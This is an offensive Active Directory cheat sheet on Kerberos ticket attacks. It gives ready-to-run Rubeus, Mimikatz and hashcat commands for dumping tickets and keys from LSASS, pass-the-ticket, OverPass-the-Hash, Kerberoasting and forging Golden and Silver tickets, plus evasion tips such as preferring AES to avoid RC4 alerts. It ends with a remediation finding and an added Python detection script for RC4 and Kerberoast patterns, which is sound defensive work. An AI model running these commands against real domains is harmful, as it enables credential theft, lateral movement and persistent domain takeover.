Methodology Checklist
- Extract tickets with Rubeus: `Rubeus.exe dump /nowrap`
- Or request a TGT: `Rubeus.exe asktgt /user:[USER] /password:[PASS] /domain:[DOMAIN]`
- Import the ticket: `Rubeus.exe ptt /ticket:[base64]`
- Verify: `klist`
- Access a resource: `\\[TARGET]\share`, or move laterally via psexec
- Kerberoast: `Rubeus.exe kerberoast /outfile:hashes.txt /nowrap`
- Crack offline: `hashcat -m 13100 hashes.txt [wordlist]`
Operational Context
Use when: a Kerberos TGT or TGS has been stolen from LSASS or forged (Golden/Silver Ticket); inject it into the current session for seamless domain service access.
Think Dumber First: `Rubeus.exe ptt /ticket:[BASE64_TICKET]` injects the ticket into the current logon session. Then run `klist` to confirm. Then access target resources normally; Windows handles Kerberos transparently after injection.
Skip when: the ticket has expired; request a new one with valid credentials or forge one with the krbtgt hash (Golden Ticket).
Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| `mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" exit` | Export all Kerberos tickets to .kirbi files |
| `Rubeus.exe dump /nowrap` | Dump tickets as Base64 (easier to transfer) |
| `mimikatz.exe "privilege::debug" "sekurlsa::ekeys" exit` | Dump Kerberos encryption keys (AES256, RC4/NTLM) |
| `Rubeus.exe asktgt /domain:[DOMAIN] /user:[USER] /rc4:[NT_HASH] /ptt` | Request TGT from NTLM hash and inject (OverPass-the-Hash) |
| `Rubeus.exe asktgt /domain:[DOMAIN] /user:[USER] /aes256:[AES_HASH] /ptt` | Request TGT from AES256 key and inject |
| `Rubeus.exe ptt /ticket:C:\path\to\ticket.kirbi` | Import .kirbi ticket into current session |
| `Rubeus.exe ptt /ticket:[BASE64_TICKET]` | Import ticket from Base64 string |
| `mimikatz.exe "privilege::debug" "kerberos::ptt C:\path\to\ticket.kirbi" exit` | Import .kirbi via Mimikatz |
| `klist` | Verify tickets cached in current session |
| `Rubeus.exe klist` | Rubeus-based ticket list |
| `klist purge` | Clear all current session tickets |
| `dir \\DC01.[DOMAIN]\c$` | Test ticket access to DC filesystem |
| `Enter-PSSession -ComputerName DC01.[DOMAIN]` | PowerShell remoting using injected ticket |
| `Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show` | Create sacrificial process (LUID) for isolated ticket injection |
Deep Dive & Workflow
TGT vs TGS
- TGT (krbtgt service): proof of identity; used to request service tickets
- TGS (specific service): grants access to a single resource (CIFS, MSSQL, HTTP)
For lateral movement, TGTs are more valuable: they can generate any service ticket. TGS tickets are pre-baked for a single target.
Harvesting Tickets
Mimikatz exports tickets as .kirbi files: machine accounts end in `$`, and target user TGTs have `krbtgt` in the filename. `Rubeus dump /nowrap` outputs Base64, which is easier to copy between machines than files.
OverPass-the-Hash (Pass-the-Key)
When you have a hash but no ticket, use the hash to request a fresh TGT from the KDC:
```
# Prefer AES256 on modern domains; RC4 may trigger alerts
Rubeus.exe asktgt /domain:[DOMAIN] /user:[USER] /aes256:[HASH] /ptt
```
AES256 keys are extracted with `sekurlsa::ekeys` in Mimikatz (requires admin).
Sacrificial Process Technique
Inject a ticket into an isolated process to avoid overwriting your current session's TGT:
```
# Step 1: Spawn a hidden CMD process with its own LUID
Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show
# Step 2: In the new CMD window, request + inject ticket
Rubeus.exe asktgt /user:[USER] /domain:[DOMAIN] /aes256:[HASH] /ptt
# Step 3: Use PowerShell Remoting from within that window
powershell
Enter-PSSession -ComputerName DC01
```
Mimikatz Ticket Files
- `[0;6c680]-2-0-40e10000-john@krbtgt-inlanefreight.htb.kirbi`: user TGT (target)
- `[0;3e7]-0-2-40a50000-DC01$@cifs-dc01.inlanefreight.htb.kirbi`: machine ticket (ignore)
Target files where the service is `krbtgt` and there is no `$` in the username section.
Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Rubeus not available | AV blocking | Use Mimikatz: kerberos::ptt ticket.kirbi; or impacket for Linux-side injection |
| klist shows ticket but access denied | Ticket for wrong SPN | Ensure ticket SPN matches target service; request new TGS: Rubeus.exe asktgs /ticket:[TGT] /service:cifs/[HOST] |
| Golden ticket fails | Wrong krbtgt hash or domain SID | Verify: domain SID from Get-DomainSID; krbtgt NTLM hash from DCSync; Mimikatz kerberos::golden |
| Silver ticket not working | Wrong service account hash or SPN | Silver ticket needs service account NTLM hash and correct SPN format: cifs/hostname |
| Ticket injection works but expires | Short ticket lifetime | Golden ticket default 10 years; for real tickets, request with long lifetime: Rubeus.exe asktgt /renewable /renewmax:99999 |
Reporting Trigger
Finding Title: Kerberos Ticket Injection Enables Stealthy Lateral Movement
Impact: Kerberos ticket injection bypasses credential requirements for domain service access, with Golden Tickets providing effectively permanent domain access that persists even after password resets (only a krbtgt reset invalidates golden tickets).
Root Cause: krbtgt NTLM hash compromised via DCSync. No detection of abnormal ticket lifetimes or forged PAC attributes in Kerberos tickets.
Recommendation: Reset the krbtgt password twice (with a 24-hour gap) after any compromise. Deploy Microsoft Defender for Identity to detect Golden Ticket indicators (abnormal ticket lifetimes, missing PAC). Implement Privileged Access Workstations to prevent krbtgt hash exposure.
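The cheat sheet notes that RC4 requests "may trigger alerts" and the finding above records that no detection of ticket abuse existed. The following added example (not part of the original cheat sheet, and not Rubeus or Mimikatz code) shows what the blue-team side of that looks like: two simple heuristics run over Security-log events 4768 (TGT requested) and 4769 (service ticket requested). It assumes the events have already been exported into dicts carrying the standard fields TargetUserName, ServiceName, TicketEncryptionType, IpAddress and TimeCreated; the sample events are constructed for illustration and are not real log data.

```python
"""Kerberos ticket-abuse detection heuristics over exported DC Security events.

Added example; assumes events were exported from the Security log into dicts
with the fields of Event IDs 4768 and 4769. The event records below are
constructed sample data, not real logs.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Kerberos encryption types as logged in TicketEncryptionType:
# 0x17 = RC4-HMAC (NTLM-hash derived), 0x11 = AES128, 0x12 = AES256.
RC4_HMAC = "0x17"

# Constructed sample events. In 4769, ServiceName is the service *account*
# (machine accounts end in '$'), and TargetUserName is user@REALM.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "john", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.25", "TimeCreated": "2024-01-10T09:00:00"},
    # TGT issued with RC4 on an AES-capable domain: matches the /rc4 OverPass-the-Hash flow
    {"EventID": 4768, "TargetUserName": "svc_backup", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.77", "TimeCreated": "2024-01-10T09:01:00"},
    # One user pulling RC4 service tickets for several service accounts within a minute
    {"EventID": 4769, "TargetUserName": "john@CORP.LOCAL", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.25", "TimeCreated": "2024-01-10T09:05:00"},
    {"EventID": 4769, "TargetUserName": "john@CORP.LOCAL", "ServiceName": "svc_web",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.25", "TimeCreated": "2024-01-10T09:05:20"},
    {"EventID": 4769, "TargetUserName": "john@CORP.LOCAL", "ServiceName": "svc_backup",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.25", "TimeCreated": "2024-01-10T09:05:40"},
    # Machine-account service ticket with AES: normal SMB/CIFS traffic, ignored by the burst rule
    {"EventID": 4769, "TargetUserName": "john@CORP.LOCAL", "ServiceName": "DC01$",
     "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.25", "TimeCreated": "2024-01-10T09:06:00"},
    {"EventID": 4769, "TargetUserName": "alice@CORP.LOCAL", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.31", "TimeCreated": "2024-01-10T09:10:00"},
]


def rc4_downgrade_events(events):
    """Return every 4768/4769 event where the KDC issued an RC4-encrypted ticket.

    RC4 on a domain whose accounts support AES is the encryption downgrade that
    both OverPass-the-Hash with an NT hash and Kerberoast requests produce.
    """
    return [e for e in events if str(e["TicketEncryptionType"]).lower() == RC4_HMAC]


def kerberoast_bursts(events, min_services=3, window=timedelta(minutes=5)):
    """Flag (user, source IP) pairs that requested service tickets for at least
    min_services distinct non-machine service accounts inside one time window.

    krbtgt (TGT renewals) and '$' machine accounts are excluded because they are
    not Kerberoastable and would otherwise swamp the count.
    """
    by_source = defaultdict(list)
    for e in events:
        svc = e["ServiceName"]
        if e["EventID"] != 4769 or svc.lower() == "krbtgt" or svc.endswith("$"):
            continue
        key = (e["TargetUserName"], e["IpAddress"])
        by_source[key].append((datetime.fromisoformat(e["TimeCreated"]), svc))

    flagged = {}
    for key, requests in by_source.items():
        requests.sort()
        # Slide a window anchored at each request; first window that crosses the threshold wins.
        for i, (start, _) in enumerate(requests):
            services = {svc for t, svc in requests[i:] if t - start <= window}
            if len(services) >= min_services:
                flagged[key] = sorted(services)
                break
    return flagged


if __name__ == "__main__":
    for e in rc4_downgrade_events(SAMPLE_EVENTS):
        print(f"RC4 ticket: {e['EventID']} {e['TargetUserName']} -> {e['ServiceName']} from {e['IpAddress']}")
    for (user, ip), services in kerberoast_bursts(SAMPLE_EVENTS).items():
        print(f"Kerberoast burst: {user} from {ip} requested {services}")
```

Both rules are coarse on purpose: the RC4 rule needs an allow-list for legacy services that genuinely still use RC4, and the burst threshold should be tuned against a baseline of how many distinct service accounts a normal user touches. Neither rule sees ticket lifetime or PAC contents, which is why the recommendation above still points at Defender for Identity for Golden Ticket detection.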